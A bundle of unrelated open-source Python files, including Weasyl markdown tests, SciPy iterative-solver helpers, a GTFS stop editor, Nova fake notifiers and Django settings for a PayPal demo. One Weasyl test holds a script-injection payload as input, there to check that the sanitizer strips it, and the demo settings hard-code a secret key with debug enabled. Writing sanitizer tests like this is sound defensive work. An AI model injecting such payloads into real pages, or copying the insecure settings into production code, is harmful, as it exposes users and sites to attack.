'<a href="/~spam" class="user-icon"><img src="/~spam/avatar" alt="spam"></a>'),
('<!~spam>', '<a href="/~spam" class="user-icon"><img src="/~spam/avatar" alt="spam"> <span>spam</span></a>'),
('', '<a href="/~example" class="user-icon"><img src="/~example/avatar"> <span>user image with alt text</span></a>'),
('<user:spam>', '<a href="/~spam">spam</a>'),
('[link](user:spam)', '<a href="/~spam">link</a>'),
('<fa:spam>', '<a href="https://www.furaffinity.net/user/spam" rel="nofollow ugc">spam</a>'),
('<da:spam>', '<a href="https://www.deviantart.com/spam" rel="nofollow ugc">spam</a>'),
('<ib:spam>', '<a href="https://inkbunny.net/spam" rel="nofollow ugc">spam</a>'),
('<sf:spam>', '<a href="https://spam.sofurry.com/" rel="nofollow ugc">spam</a>'),
]
@pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests)
def test_markdown_basic_user_linking(target, expected):
assert markdown(target) == '<p>%s</p>\n' % (expected,)
@pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests)
def test_markdown_user_linking_in_tag(target, expected):
assert markdown('<em>%s</em>' % (target,)) == '<p><em>%s</em></p>\n' % (expected,)
@pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests)
def test_markdown_user_linking_in_tail(target, expected):
assert markdown('<em>eggs</em>%s' % (target,)) == '<p><em>eggs</em>%s</p>\n' % (expected,)
@libxml_xfail
@pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests)
def test_markdown_user_linking_twice_in_tag(target, expected):
assert markdown('<em>%s %s</em>' % (target, target)) == '<p><em>%s %s</em></p>\n' % (expected, expected)
@pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests)
def test_markdown_user_linking_twice_in_tag_with_more_text_between(target, expected):
assert markdown('<em>%s spam %s</em>' % (target, target)) == '<p><em>%s spam %s</em></p>\n' % (expected, expected)
@libxml_xfail
@pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests)
def test_markdown_user_linking_twice_in_tail(target, expected):
assert markdown('<em>eggs</em>%s %s' % (target, target)) == (
'<p><em>eggs</em>%s %s</p>\n' % (expected, expected))
@pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests)
def test_markdown_user_linking_twice_in_tail_with_more_text_betweeen(target, expected):
assert markdown('<em>eggs</em>%s spam %s' % (target, target)) == (
'<p><em>eggs</em>%s spam %s</p>\n' % (expected, expected))
@pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests)
def test_markdown_user_linking_in_markdown(target, expected):
assert markdown('*%s*' % (target,)) == '<p><em>%s</em></p>\n' % (expected,)
def test_markdown_no_user_links_in_code():
assert markdown('<code><~spam></code>') == '<p><code><~spam></code></p>\n'
def test_markdown_no_user_links_in_pre():
assert markdown('<pre><~spam></pre>') == '<pre><p><~spam></p></pre>\n'
def test_markdown_no_user_links_in_links():
assert markdown('<a><~spam></a>') == '<p><a><~spam></a></p>\n'
def test_markdown_escaped_user_link():
assert markdown('\\\\<~spam>') == '<p><~spam></p>\n'
def test_markdown_multi_element():
assert markdown('one\n\ntwo') == '<p>one</p>\n\n<p>two</p>\n'
def test_markdown_user_linking_with_underscore():
assert markdown('<~hello_world>') == '<p><a href="/~helloworld">hello_world</a></p>\n'
def test_markdown_image_replacement():
assert markdown('') == '<p><a href="http://example" rel="nofollow ugc">example</a></p>\n'
assert markdown('<img alt="broken">') == '<p><a href="">broken</a></p>\n'
def test_forum_whitelist():
assert markdown('https://forums.weasyl.com/foo') == (
'<p><a href="https://forums.weasyl.com/foo">https://forums.weasyl.com/foo</a></p>\n')
def test_markdown_no_autolink_in_html_link():
assert markdown('[https://foo.test/](https://bar.test/)') == '<p><a href="https://bar.test/" rel="nofollow ugc">https://foo.test/</a></p>\n'
assert markdown('[@foo@bar.test](https://baz.test/)') == '<p><a href="https://baz.test/" rel="nofollow ugc">@foo@bar.test</a></p>\n'
assert markdown('<a href="https://bar.test/">https://foo.test/</a>') == '<p><a href="https://bar.test/" rel="nofollow ugc">https://foo.test/</a></p>\n'
assert markdown('<A href="https://baz.test/">@foo@bar.test</A>') == '<p><a href="https://baz.test/" rel="nofollow ugc">@foo@bar.test</a></p>\n'
assert markdown('<a href="https://baz.test/">@foo@bar.test</a>') == '<p><a href="https://baz.test/" rel="nofollow ugc">@foo@bar.test</a></p>\n'
assert markdown('<b>https://foo.test/</b>') == '<p><b><a href="https://foo.test/" rel="nofollow ugc">https://foo.test/</a></b></p>\n'
assert markdown('<b>@foo@bar.test</b>') == '<p><b>@<a href="mailto:foo@bar.test">foo@bar.test</a></b></p>\n'
def test_markdown_unordered_list():
assert markdown('- five\n- six\n- seven') == '<ul><li>five</li>\n<li>six</li>\n<li>seven</li>\n</ul>'
def test_markdown_regular_ordered_list_start():
assert markdown('1. five\n1. six\n1. seven') == '<ol start="1"><li>five</li>\n<li>six</li>\n<li>seven</li>\n</ol>'
def test_markdown_respect_ordered_list_start():
assert markdown('5. five\n6. six\n7. seven') == '<ol start="5"><li>five</li>\n<li>six</li>\n<li>seven</li>\n</ol>'
def test_markdown_strikethrough():
assert markdown(u"~~test~~") == u"<p><del>test</del></p>\n"
@pytest.mark.parametrize(('target', 'expected'), [
(u"[external](http://example.com/)", u'<a href="http://example.com/" rel="nofollow ugc">external</a>'),
(u'<a href="http://example.com/">external</a>', u'<a href="http://example.com/" rel="nofollow ugc">external</a>'),
(u'<a href="http://example.com/" rel="noreferrer">external</a>', u'<a href="http://example.com/" rel="nofollow ugc">external</a>'),
(u"[external](//example.com/)", u'<a href="//example.com/" rel="nofollow ugc">external</a>'),
])
def test_markdown_external_link_noreferrer(target, expected):
assert markdown(target) == u"<p>%s</p>\n" % (expected,)
markdown_link_tests = [
(('spam', '/eggs'), '[spam](/eggs)'),
((']spam[', '/eggs'), r'[\]spam\[](/eggs)'),
(('[[spam]', '/eggs'), r'[\[\[spam\]](/eggs)'),
]
@pytest.mark.parametrize(('target', 'expected'), markdown_link_tests)
def test_markdown_link(target, expected):
assert markdown_link(*target) == expected
def test_tag_stripping():
assert markdown(u"<button>text</button>") == u"<p>text</p>\n"
assert markdown(u"<button><button>text</button></button>") == u"<p>text</p>\n"
assert markdown(u"<!--[if IE]><script>alert(1)</script><![endif]-->") == u"\n"
markdown_excerpt_tests = [
(u'', u''),
(u'short', u'short'),
(u'just short enoughAAAAAAAAAAAAA', u'just short enoughAAAAAAAAAAAAA'),
(u'not short enoughAAAAAAAAAAAAAAA', u'not short enoughAAAAAAAAAAAAA…'),
(u'*leading* inline formatting', u'leading inline formatting'),
(u'middle *inline* formatting', u'middle inline formatting'),
(u'trailing inline *formatting*', u'trailing inline formatting'),
(u'*nested **inline** formatting*', u'nested inline formatting'),
(u' unnecessary whitespace\t', u'unnecessary whitespace'),
(u'multiple\nlines', u'multiple lines'),
(u'multiple \nlines', u'multiple lines'),
(u'multiple\n\nparagraphs', u'multiple paragraphs'),
(u'Üñíçôđe\N{COMBINING ACUTE ACCENT}', u'Üñíçôđe\N{COMBINING ACUTE ACCENT}'),
(u'single-codepoint graphemes😊😊😊😊', u'single-codepoint graphemes😊😊😊😊'),
(u'single-codepoint graphemes😊😊😊😊😊', u'single-codepoint graphemes😊😊😊…'),
(u'test\n - lists\n - of\n - items\n\ntest', u'test lists of items test'),
]
@pytest.mark.parametrize(('target', 'expected'), markdown_excerpt_tests)
def test_excerpt(target, expected):
assert markdown_excerpt(target, length=30) == expected
def test_excerpt_default_length():
assert markdown_excerpt(u'a' * 300) == u'a' * 300
assert markdown_excerpt(u'a' * 301) == u'a' * 299 + u'…'
|
Weasyl/weasyl
|
libweasyl/libweasyl/test/test_text.py
|
Python
|
apache-2.0
| 8,802
|
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2018-2021 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Access to the qutebrowser configuration."""
from typing import cast, Any
from PyQt5.QtCore import QUrl
from qutebrowser.config import config
#: Simplified access to config values using attribute access.
#: For example, to access the ``content.javascript.enabled`` setting,
#: you can do::
#:
#: if config.val.content.javascript.enabled:
#: ...
#:
#: This also supports setting configuration values::
#:
#: config.val.content.javascript.enabled = False
val = cast('config.ConfigContainer', None)
def get(name: str, url: QUrl = None) -> Any:
"""Get a value from the config based on a string name."""
return config.instance.get(name, url)
|
forkbong/qutebrowser
|
qutebrowser/api/config.py
|
Python
|
gpl-3.0
| 1,462
|
"""
Loads editquality config, mainly used as template parameters.
The responsibility of this process is to simplify the template's work and other
consumers, as much as possible.
"""
import glob
import os
import deep_merge
import yaml
def load_config(config_dir=None):
model_defaults = yaml.safe_load(
open(os.path.join(config_dir, "model_defaults.yaml")))
wiki_defaults = yaml.safe_load(
open(os.path.join(config_dir, "wiki_defaults.yaml")))
manual_wikis = yaml.safe_load(
open(os.path.join(config_dir, "manual_wikis.yaml")))
globals = yaml.safe_load(
open(os.path.join(config_dir, "globals.yaml")))
all_files = sorted(glob.glob(config_dir + "/wikis/*.yaml"))
wikis = [yaml.safe_load(open(f, "r")) for f in all_files]
wiki_names = [i['name'] for i in wikis] + manual_wikis['manual_wikis']
wiki_names.sort()
config = {
"model_defaults": model_defaults,
"wiki_defaults": wiki_defaults,
"globals": globals,
"wikis": wikis,
'wiki_names': wiki_names,
}
config = populate_defaults(config)
config['wikis'].sort(key=lambda t: t['name'])
return config
def load_wiki(wiki_config, config):
# Merge in wiki defaults
wiki_config = deep_merge.merge({}, config["wiki_defaults"], wiki_config,
merge_lists=deep_merge.overwrite)
for model_name, model_config in wiki_config.get('models', {}).items():
# Merge in model defaults
model_config = deep_merge.merge(
{}, config["model_defaults"], model_config)
wiki_config['models'][model_name] = model_config
return wiki_config
def populate_defaults(config):
wikis_config = []
for wiki_config in config["wikis"]:
wikis_config.append(load_wiki(wiki_config, config))
config["wikis"] = wikis_config
return config
|
wiki-ai/editquality
|
editquality/config.py
|
Python
|
mit
| 1,884
|
#!/usr/bin/env python
import io
import os
import os.path
import re
from setuptools import setup, find_packages
# FIXME: this information should come from the script itself...
__projectname__ = "suse-doc-style-checker"
__programname__ = "SUSE Documentation Style Checker"
# __version__ will be read from sdsc/__init__.py
__authors__ = "Stefan Knorr, Thomas Schraitle"
__license__ = "LGPL-2.1+"
__description__ = "checks a given DocBook XML file for stylistic errors"
HERE = os.path.abspath(os.path.dirname(__file__))
def requires(filename):
"""Returns a list of all pip requirements
:param filename: the Pip requirement file (usually 'requirements.txt')
:return: list of modules
:rtype: list
"""
modules = []
with open(filename, 'r') as pipreq:
for line in pipreq:
line = line.strip()
if line.startswith('#') or not line:
continue
# if line.startswith('-r'):
# TODO: what to do here?
modules.append(line)
return modules
def read(*names, **kwargs):
"""Read in file
"""
with io.open(os.path.join(HERE, *names),
encoding=kwargs.get("encoding", "utf8")) as fp:
return fp.read()
def find_version(*file_paths):
"""Read __version__ string from file paths
:return: version string
:rtype: str
"""
version_file = read(*file_paths)
version_match = re.search(r"^__version__\s*=\s*['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
setupdict = dict(
name=__projectname__,
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# http://python-packaging-user-guide.readthedocs.org/en/latest/single_source_version/
version=find_version("src", "sdsc", "__init__.py"), # __version__,
description=__description__,
long_description="Checks a given DocBook XML file for stylistic errors using check files written in XSLT",
# The project's main homepage.
url='https://www.github.org/openSUSE/suse-doc-style-checker',
download_url='https://github.org/openSUSE/suse-doc-style-checker/releases',
# Author details
author=__authors__,
author_email='sknorr@suse.de',
license=__license__,
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 5 - Production/Stable',
# Indicate who your project is intended for
'Topic :: Documentation',
'Topic :: Software Development :: Documentation',
'Intended Audience :: Developers',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: GNU Lesser General Public License v2 or later (LGPLv2+)',
# Supported Python versions
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Utilities',
],
keywords=["docbook5", "style", "style-checking"],
# ----
# Includes data files from MANIFEST.in
#
# See also:
# http://stackoverflow.com/a/16576850
# https://pythonhosted.org/setuptools/setuptools.html#including-data-files
include_package_data=True,
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
# toms: Check this
packages=find_packages('src', exclude=('.+\.xml',)),
package_dir={'': 'src'},
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=requires('requirements.txt'),
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': ['sdsc=sdsc.cli:main'],
},
# Required packages for using "setup.py test"
setup_requires=['pytest-runner'],
tests_require=['pytest', 'pytest-cov', 'pytest-catchlog'],
)
# Call it:
setup(**setupdict)
# EOF
|
tomschr/sdsc
|
setup.py
|
Python
|
lgpl-2.1
| 4,642
|
# Copyright (c) 2017 Huawei, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
import horizon
from conveyordashboard import dashboard
class ProjectLevelOverview(horizon.Panel):
name = _("Project Level")
slug = 'overview_project'
dashboard.Conveyor.register(ProjectLevelOverview)
|
Hybrid-Cloud/conveyor-dashboard
|
conveyordashboard/overview_project/panel.py
|
Python
|
apache-2.0
| 878
|
#!/usr/bin/python2.5
# Copyright (C) 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Editor of stop locations in GTFS feed.
#
# This is an extension of schedule_viewer.py, which allows editing
# of stop location usig drag'n'drop.
# You must provide a Google Maps API key.
#
# Usage:
# location_editor.py --key `cat key` --port 8765 --feed_filename feed.zip
import schedule_viewer
import transitfeed
class LocationEditorRequestHandler(schedule_viewer.ScheduleRequestHandler):
def handle_json_GET_setstoplocation(self, params):
schedule = self.server.schedule
stop_id = params.get('id', None)
lat = params.get('lat', -1)
lon = params.get('lng', -1)
stop = schedule.GetStop(stop_id)
if (stop is None):
msg = 'Stop with id=' + stop_id + 'not found.'
else:
stop.stop_lat = float(lat)
stop.stop_lon = float(lon)
msg = 'Location of ' + stop['stop_name'] + '(' + stop_id + ') set to ' + \
lat + 'x' + lon
print msg
return msg
def handle_json_GET_savedata(self, params):
schedule = self.server.schedule
if not self.server.feed_path:
msg = 'Feed path not defined'
else:
schedule.WriteGoogleTransitFeed(self.server.feed_path)
msg = 'Data saved to ' + self.server.feed_path
print msg
return msg
def AllowEditMode(self):
return True
if __name__ == '__main__':
schedule_viewer.main(LocationEditorRequestHandler)
|
Censio/transitfeed
|
location_editor.py
|
Python
|
apache-2.0
| 1,943
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable-msg=C0103
# pylint: disable-msg=C0301
"""
View the status of a given xengine.
Created on Fri Jan 3 10:40:53 2014
@author: paulp
"""
import argparse
from casperfpga import utils
from casperfpga.casperfpga import CasperFpga
try:
import corr2
import os
except ImportError:
corr2 = None
os = None
parser = argparse.ArgumentParser(
description='Display TenGBE interface information '
'about a MeerKAT fpga host.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--hosts', dest='hosts', type=str, action='store', default='',
help='comma-delimited list of hosts, or a corr2 config file')
parser.add_argument(
'-c', '--core', dest='core', action='store', default='all', type=str,
help='which core to query')
parser.add_argument(
'--arp', dest='arp', action='store_true', default=False,
help='print the ARP table')
parser.add_argument(
'--cpu', dest='cpu', action='store_true', default=False,
help='print the CPU details')
parser.add_argument(
'--comms', dest='comms', action='store', default='katcp', type=str,
help='katcp (default) or dcp?')
parser.add_argument(
'--loglevel', dest='log_level', action='store', default='',
help='log level to use, default None, options INFO, DEBUG, ERROR')
args = parser.parse_args()
if args.log_level != '':
import logging
log_level = args.log_level.strip()
try:
logging.basicConfig(level=eval('logging.%s' % log_level))
except AttributeError:
raise RuntimeError('No such log level: %s' % log_level)
# create the devices and connect to them
if args.hosts.strip() == '':
if corr2 is None or 'CORR2INI' not in os.environ.keys():
raise RuntimeError('No hosts given and no corr2 config found. '
'No hosts.')
fpgas = corr2.utils.script_get_fpgas(args)
else:
hosts = args.hosts.strip().replace(' ', '').split(',')
if len(hosts) == 0:
raise RuntimeError('No good carrying on without hosts.')
fpgas = utils.threaded_create_fpgas_from_hosts(hosts)
utils.threaded_fpga_function(fpgas, 15, ('get_system_information', [], {}))
for fpga in fpgas:
numgbes = len(fpga.gbes)
if numgbes < 1:
raise RuntimeWarning('Host %s has no gbe cores', fpga.host)
print('%s: found %i gbe core%s: %s' % (
fpga.host, numgbes, '' if numgbes == 1 else 's', fpga.gbes.keys()))
for fpga in fpgas:
if args.core == 'all':
cores = fpga.gbes.names()
else:
cores = [args.core]
print(50*'#')
print('%s:' % fpga.host)
print(50*'#')
for core in cores:
fpga.gbes[core].print_gbe_core_details(
arp=args.arp, cpu=args.cpu, refresh=True)
# handle exits cleanly
utils.threaded_fpga_function(fpgas, 10, 'disconnect')
# end
|
ska-sa/casperfpga
|
scripts/casperfpga_tengbe_coreinfo.py
|
Python
|
gpl-2.0
| 2,880
|
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test suite for devices using file transfer functions."""
import hashlib
import os
from typing import Type
from gazoo_device.tests.functional_tests.utils import gdm_test_base
import immutabledict
from mobly import asserts
_COMMANDS = immutabledict.immutabledict({
"IS_WRITABLE_DIRECTORY": "test -d {path} && test -w {path}",
"REMOVE_FILE": "rm {path}",
})
def file_sha256(src_file_path: str) -> str:
"""Calculate the SHA256 hash of the given file.
Args:
src_file_path: Path to the file to be hashed.
Returns:
SHA256 hash of the file in hex digest format.
"""
sha256sum = hashlib.sha256()
with open(src_file_path, "rb") as src_file:
buf = src_file.read(65536)
while buf:
sha256sum.update(buf)
buf = src_file.read(65536)
return sha256sum.hexdigest()
class FileTransferTestSuite(gdm_test_base.GDMTestBase):
"""Functional test suite for the file transfer capability."""
@classmethod
def is_applicable_to(cls, device_type: str,
device_class: Type[gdm_test_base.DeviceType],
device_name: str) -> bool:
"""Determine if this test suite can run on the given device."""
return device_class.has_capabilities(["file_transfer"])
@classmethod
def requires_pairing(cls) -> bool:
"""Returns True if the device must be paired to run this test suite."""
return False
def setup_test(self):
"""Creates a text source file for transfer to the device."""
super().setup_test()
file_contents = "The quick brown dog jumps over the lazy fox\n"
self.host_source_path = os.path.join(self.log_path,
"file_transfer_source.txt")
with open(self.host_source_path, "w") as open_file:
open_file.write(file_contents)
def test_file_transfer(self):
"""Tests sending a file to the device and receiving it."""
received_file_name = "file_transfer_received.txt"
device_dir = self._get_writable_directory()
device_path = os.path.join(device_dir, received_file_name)
self.device.file_transfer.send_file_to_device(self.host_source_path,
device_path)
host_received_path = os.path.join(self.log_path, received_file_name)
try:
self.device.file_transfer.recv_file_from_device(device_path,
host_received_path)
asserts.assert_true(
os.path.exists(host_received_path),
f"recv_file_from_device did not create {host_received_path}")
with open(self.host_source_path) as source_file:
with open(host_received_path) as received_file:
asserts.assert_equal(source_file.read(), received_file.read(),
"Received file was not equal to the sent file")
finally:
self.device.shell(_COMMANDS["REMOVE_FILE"].format(path=device_path))
def _get_writable_directory(self) -> str:
"""Returns a writable directory on the device."""
possible_dirs = [
"/tmp",
]
for possible_dir in possible_dirs:
_, return_code = self.device.shell(
_COMMANDS["IS_WRITABLE_DIRECTORY"].format(path=possible_dir),
include_return_code=True)
if return_code == 0:
return possible_dir
asserts.fail("Failed to find a writable directory on the device. "
f"Known possible directories {possible_dirs} did not work. "
"Find an appropriate directory and add it to the list.")
if __name__ == "__main__":
gdm_test_base.main()
|
google/gazoo-device
|
gazoo_device/tests/functional_tests/file_transfer_test_suite.py
|
Python
|
apache-2.0
| 4,139
|
from __future__ import division, print_function, absolute_import
__docformat__ = "restructuredtext en"
__all__ = []
from numpy import asanyarray, asarray, asmatrix, array, matrix, zeros
from scipy.sparse.linalg.interface import aslinearoperator, LinearOperator, \
IdentityOperator
_coerce_rules = {('f','f'):'f', ('f','d'):'d', ('f','F'):'F',
('f','D'):'D', ('d','f'):'d', ('d','d'):'d',
('d','F'):'D', ('d','D'):'D', ('F','f'):'F',
('F','d'):'D', ('F','F'):'F', ('F','D'):'D',
('D','f'):'D', ('D','d'):'D', ('D','F'):'D',
('D','D'):'D'}
def coerce(x,y):
if x not in 'fdFD':
x = 'd'
if y not in 'fdFD':
y = 'd'
return _coerce_rules[x,y]
def id(x):
return x
def make_system(A, M, x0, b):
"""Make a linear system Ax=b
Parameters
----------
A : LinearOperator
sparse or dense matrix (or any valid input to aslinearoperator)
M : {LinearOperator, Nones}
preconditioner
sparse or dense matrix (or any valid input to aslinearoperator)
x0 : {array_like, None}
initial guess to iterative method
b : array_like
right hand side
Returns
-------
(A, M, x, b, postprocess)
A : LinearOperator
matrix of the linear system
M : LinearOperator
preconditioner
x : rank 1 ndarray
initial guess
b : rank 1 ndarray
right hand side
postprocess : function
converts the solution vector to the appropriate
type and dimensions (e.g. (N,1) matrix)
"""
A_ = A
A = aslinearoperator(A)
if A.shape[0] != A.shape[1]:
raise ValueError('expected square matrix, but got shape=%s' % (A.shape,))
N = A.shape[0]
b = asanyarray(b)
if not (b.shape == (N,1) or b.shape == (N,)):
raise ValueError('A and b have incompatible dimensions')
if b.dtype.char not in 'fdFD':
b = b.astype('d') # upcast non-FP types to double
def postprocess(x):
if isinstance(b,matrix):
x = asmatrix(x)
return x.reshape(b.shape)
if hasattr(A,'dtype'):
xtype = A.dtype.char
else:
xtype = A.matvec(b).dtype.char
xtype = coerce(xtype, b.dtype.char)
b = asarray(b,dtype=xtype) # make b the same type as x
b = b.ravel()
if x0 is None:
x = zeros(N, dtype=xtype)
else:
x = array(x0, dtype=xtype)
if not (x.shape == (N,1) or x.shape == (N,)):
raise ValueError('A and x have incompatible dimensions')
x = x.ravel()
# process preconditioner
if M is None:
if hasattr(A_,'psolve'):
psolve = A_.psolve
else:
psolve = id
if hasattr(A_,'rpsolve'):
rpsolve = A_.rpsolve
else:
rpsolve = id
if psolve is id and rpsolve is id:
M = IdentityOperator(shape=A.shape, dtype=A.dtype)
else:
M = LinearOperator(A.shape, matvec=psolve, rmatvec=rpsolve,
dtype=A.dtype)
else:
M = aslinearoperator(M)
if A.shape != M.shape:
raise ValueError('matrix and preconditioner have different shapes')
return A, M, x, b, postprocess
|
Eric89GXL/scipy
|
scipy/sparse/linalg/isolve/utils.py
|
Python
|
bsd-3-clause
| 3,337
|
"""
Django settings for paypal_demo project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'gt^xy(p!5wcff5@zy#^cnvuz9ry#-#g$59du41x@a!l=#)3q6+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'paypal_demo',
]
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'paypal_demo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'paypal_demo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
#PayPal Settings
INSTALLED_APPS.append('paypal.standard.ipn')
PAYPAL_RECEIVER_EMAIL = "sandbox@neutrondrive.com"
|
pizzapanther/Getting-Paid-With-Python
|
paypal_demo/paypal_demo/settings.py
|
Python
|
mit
| 2,758
|
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import functools
import threading
import oslo_messaging as messaging
from oslo_serialization import jsonutils
from nova import rpc
SUBSCRIBERS = collections.defaultdict(threading.Event)
NOTIFICATIONS = []
VERSIONED_NOTIFICATIONS = []
def reset():
del NOTIFICATIONS[:]
del VERSIONED_NOTIFICATIONS[:]
SUBSCRIBERS.clear()
FakeMessage = collections.namedtuple('Message',
['publisher_id', 'priority',
'event_type', 'payload', 'context'])
class FakeNotifier(object):
def __init__(self, transport, publisher_id, serializer=None):
self.transport = transport
self.publisher_id = publisher_id
self._serializer = serializer or messaging.serializer.NoOpSerializer()
for priority in ['debug', 'info', 'warn', 'error', 'critical']:
setattr(self, priority,
functools.partial(self._notify, priority.upper()))
def prepare(self, publisher_id=None):
if publisher_id is None:
publisher_id = self.publisher_id
return self.__class__(self.transport, publisher_id,
serializer=self._serializer)
def _notify(self, priority, ctxt, event_type, payload):
payload = self._serializer.serialize_entity(ctxt, payload)
# NOTE(sileht): simulate the kombu serializer
# this permit to raise an exception if something have not
# been serialized correctly
jsonutils.to_primitive(payload)
# NOTE(melwitt): Try to serialize the context, as the rpc would.
# An exception will be raised if something is wrong
# with the context.
self._serializer.serialize_context(ctxt)
msg = FakeMessage(self.publisher_id, priority, event_type,
payload, ctxt)
NOTIFICATIONS.append(msg)
def is_enabled(self):
return True
class FakeVersionedNotifier(FakeNotifier):
def _notify(self, priority, ctxt, event_type, payload):
payload = self._serializer.serialize_entity(ctxt, payload)
notification = {'publisher_id': self.publisher_id,
'priority': priority,
'event_type': event_type,
'payload': payload}
VERSIONED_NOTIFICATIONS.append(notification)
_notify_subscribers(notification)
def stub_notifier(test):
test.stub_out('oslo_messaging.Notifier', FakeNotifier)
if rpc.LEGACY_NOTIFIER and rpc.NOTIFIER:
test.stub_out('nova.rpc.LEGACY_NOTIFIER',
FakeNotifier(rpc.LEGACY_NOTIFIER.transport,
rpc.LEGACY_NOTIFIER.publisher_id,
serializer=getattr(rpc.LEGACY_NOTIFIER,
'_serializer',
None)))
test.stub_out('nova.rpc.NOTIFIER',
FakeVersionedNotifier(rpc.NOTIFIER.transport,
rpc.NOTIFIER.publisher_id,
serializer=getattr(rpc.NOTIFIER,
'_serializer',
None)))
def wait_for_versioned_notification(event_type, timeout=1.0):
# NOTE: The event stored in SUBSCRIBERS is not used for synchronizing
# the access to shared state as there is no parallel access to
# SUBSCRIBERS because the only parallelism is due to eventlet.
# The event is simply used to avoid polling the list of received
# notifications
return SUBSCRIBERS[event_type].wait(timeout)
